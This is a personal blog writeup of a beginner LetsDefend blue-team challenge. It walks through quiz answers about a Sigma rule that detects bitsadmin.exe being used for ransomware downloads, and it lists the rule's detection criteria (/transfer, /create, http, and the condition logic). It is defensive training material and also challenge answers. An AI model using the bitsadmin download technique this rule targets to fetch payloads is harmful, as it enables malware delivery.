Skip to main content
Policy to Packets
Policy to Packets
  1. Policy to Packets/
  2. Writeups/
  3. LetsDefend/
  4. Challenge/

(Writeup) LetsDefend Challenge - Learn Sigma

LetsDefend Beginner Challenge Security_Analyst Sigma Writeup YAML
Table of Contents

Welcome!
#

  • LetsDefend is a Blue Team Training platform.
  • This writeup is a challenge on LetsDefend.

Challenge Details:
#

  • Role targeted: Security Analyst
  • Skill Level: Beginner

Description:
#

Your organization has detected a ransomware infection on one of its critical systems, and it is imperative that you address this issue immediately. This type of malware searches for valuable files, such as sensitive documents and configuration files, and encrypts them using a strong encryption algorithm.

The investigation has revealed that the ransomware may have used the Windows utility bitsadmin.exe to download additional malicious payloads or communicate with its command-and-control (C2) server.

Your task is to carefully review the Sigma rule, answer the related questions, and understand how different rule sections (selection, condition, fields, tags, logsource) work together to detect malicious activity.

File Location: C:\Users\LetsDefend\Desktop\ChallengeFile\proc_creation_win_bitsadmin_download.yml

Lab Start:
#

We were already given the file location. As soon as the VM opens, we can open the YAML file in Notepad++.

Oh, it’s surprisingly short. Let’s answer the questions.

Questions:
#

  1. Which executable file was specifically targeted by this Sigma rule?
    • We can find this under: detection -> selection_img -> OriginalFileName
      • Answer: bitsadmin.exe
  2. What command-line option is used to indicate a file transfer in this rule?
    • The word “transfer” gives it away. Line 26.
      • Answer: /transfer
  3. What logical expression in the condition field combined the criteria to trigger this rule?
    • They mention the condition field. Line 33.
      • Answer: selection_img and (selection_cmd or all of selection_cli_*)
  4. Which specific field did this rule capture that shows the command being executed?
    • “fields” section seems correct. Line 34-36
      • Answer: CommandLine
  5. Which single ATT&CK tactic tag is listed first in this rule?
    • Tags on lines 12-17, first one on line 13.
      • Answer: attack.defense-evasion
  6. What is the primary category of events that this Sigma rule was written to monitor?
    • “category” keyword. Line 19.
      • Answer: process_creation
  7. What specific command-line argument did this rule look for to identify HTTP-based downloads?
    • Quick scan for “HTTP” finds you on line 32.
      • Answer: http
  8. Which command-line option must be present to create a new transfer using bitsadmin?
    • Key word “create”. Line 29.
      • Answer: /create
Reed Eggleston
Author
Reed Eggleston
B.S. in Cybersecurity | SSCP | CySA+ | PenTest+ | Project+